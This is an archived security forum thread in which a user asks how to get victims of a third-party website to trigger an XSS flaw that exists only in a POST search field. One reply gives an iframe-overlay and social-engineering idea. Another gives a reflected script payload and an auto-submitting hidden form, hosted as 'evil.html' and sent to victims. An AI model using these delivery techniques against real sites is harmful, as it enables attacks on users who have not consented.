Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Basic XSS question
Posted by: Gobo
Date: June 09, 2009 10:53AM

I have found a website with an XSS vulnerability in a field that can't be accessed from a URL like the example below;

www.example.com/search.php?a=xssHere

The XSS vulnerability only works if I manually type in the script into the field.
How do I make it possible to link others to a page with the XSS included (submitted)?

When the search button is clicked, the page gets updated with the search data from a 'call_ajax' function, so the page doesn't get refreshed. Is this still exploitable?



Edited 1 time(s). Last edit at 06/09/2009 11:01AM by Gobo.

Options: ReplyQuote
Re: Basic XSS question
Posted by: Anonymous User
Date: June 09, 2009 11:54AM

Try working with images - the browser will attempt to load them even if the content came in via Ajax providing you load and error events.

Options: ReplyQuote
Re: Basic XSS question
Posted by: Gobo
Date: June 09, 2009 01:18PM

.mario Wrote:
-------------------------------------------------------
> Try working with images - the browser will attempt
> to load them even if the content came in via Ajax
> providing you load and error events.

I think you misunderstood me. My problem is not with finding an XSS vector, it's with somehow getting that XSS'd page to display for other users. My problem is that the search field can't be submitted from the URL like a normal XSS attack where a crafted URL is given to a victim (shown in my example), so I'm looking for alternatives.



Edited 1 time(s). Last edit at 06/09/2009 01:18PM by Gobo.

Options: ReplyQuote
Re: Basic XSS question
Posted by: Gareth Heyes
Date: June 09, 2009 01:28PM

@Gobo

Try using a iframe to the target site and overlaying the target area and then social engineering to click the button. I presume the button is activated with a javascript event rather than a post or get action. You need to be able to provide content either stored or reflected in some form to conduct an attack.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Basic XSS question
Posted by: PaPPy
Date: June 09, 2009 03:04PM

ignore my post below, i was dumb and didnt read everything about the ajax

-------

are u talking about POST vs GET?

see if you can see what the search value is, and setting it in the URL. that sometimes work
ex: hxxp://site.com/search.php?s="><script>alert(1);</script>

or you can setup a free site somewhere, and do an automatic form submission
<body onload=Form.form1.submit()>
<form method=post action=http://site.com/search.php>
<input type=hidden name=search value='"><script>alert(1);</script>
<input type=submit>
</form>

then send them the url to your free site
http://freesite.com/evil.html

and boom they are xssed


i hope thats what you are trying to do

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 06/09/2009 03:06PM by PaPPy.

Options: ReplyQuote
Re: Basic XSS question
Posted by: Kyo
Date: June 10, 2009 11:16AM

http://wocares.com/pf3.php

Options: ReplyQuote
Re: Basic XSS question
Posted by: bobku
Date: February 16, 2010 09:48AM

Gobo have you managed to include the script in that page?

I have a similar problem where everything works fine just when introduced manually.

The link doesn't change when the <script> is added to the Search; it has javascript:executeSearch().

Thx.



Edited 1 time(s). Last edit at 02/16/2010 09:51AM by bobku.

Options: ReplyQuote


Sorry, only registered users may post in this forum.